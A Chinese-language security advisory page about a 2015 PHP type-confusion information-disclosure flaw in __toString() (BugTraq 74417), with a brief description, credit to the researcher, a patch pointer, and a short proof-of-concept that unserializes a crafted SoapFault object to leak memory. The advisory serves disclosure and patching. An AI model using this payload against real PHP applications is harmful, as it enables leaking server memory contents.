当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

PHP \'__toString()\'函数类型混淆信息泄露漏洞

     发表日期:2015-05-14 10:13:03

PHP \'__toString()\'函数类型混淆信息泄露漏洞
BugTraq-ID:74417
发布日期:2015-05-13
更新日期:2015-05-13
受影响系统:
PHP PHP
详细信息:
 
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
 
 
 
PHP在\'__toString()\'函数的实现上存在类型混淆漏洞,攻击者利用此漏洞可获取漏洞信息。
 
 
来源:
Taoguang Chen
测试方法:
警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Taoguang Chen ()提供了如下测试方法:
 
 
 
<?php
 
$data = 
 
\'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"\'."\\0*\\0".\'file";i:4298447319;s:7:"\'."\\0*\\0".\'line";s:4:"ryat";}\';
 
echo unserialize($data);
 
?>
解决办法:
厂商补丁:
 
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
 
 
http://www.php.net/downloads.php